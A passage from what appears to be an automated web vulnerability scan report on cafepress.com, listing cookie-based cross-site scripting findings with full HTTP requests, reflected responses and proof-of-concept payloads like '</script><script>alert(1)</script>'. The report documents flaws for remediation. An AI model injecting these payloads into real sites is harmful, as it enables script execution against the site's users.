__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59694 Date: Sun, 26 Dec 2010 13:49:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59694 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.35. http://www.cafepress.com/+greeting_cards [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+greeting_cards
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53143</script><script>alert(1)</script>28c54f936c4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=53143</script><script>alert(1)</script>28c54f936c4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 59716 Date: Sun, 26 Dec 2010 13:49:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59716 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '53143</script><script>alert(1)</script>28c54f936c4 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.36. http://www.cafepress.com/+hats-caps [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+hats-caps
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a79d4"-alert(1)-"d4edfd82353 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59421 Date: Sun, 26 Dec 2010 13:47:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59421 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.37. http://www.cafepress.com/+hats-caps [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+hats-caps
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64dd9</script><script>alert(1)</script>4516792b671 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=64dd9</script><script>alert(1)</script>4516792b671 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59443 Date: Sun, 26 Dec 2010 13:47:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59443 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '64dd9</script><script>alert(1)</script>4516792b671 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.38. http://www.cafepress.com/+ipad-cases [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+ipad-cases
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4658a"-alert(1)-"85663dcf2b1 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 88289 Date: Sun, 26 Dec 2010 13:46:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88289 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.39. http://www.cafepress.com/+ipad-cases [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+ipad-cases
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da017</script><script>alert(1)</script>5b17e49d25b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=da017</script><script>alert(1)</script>5b17e49d25b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
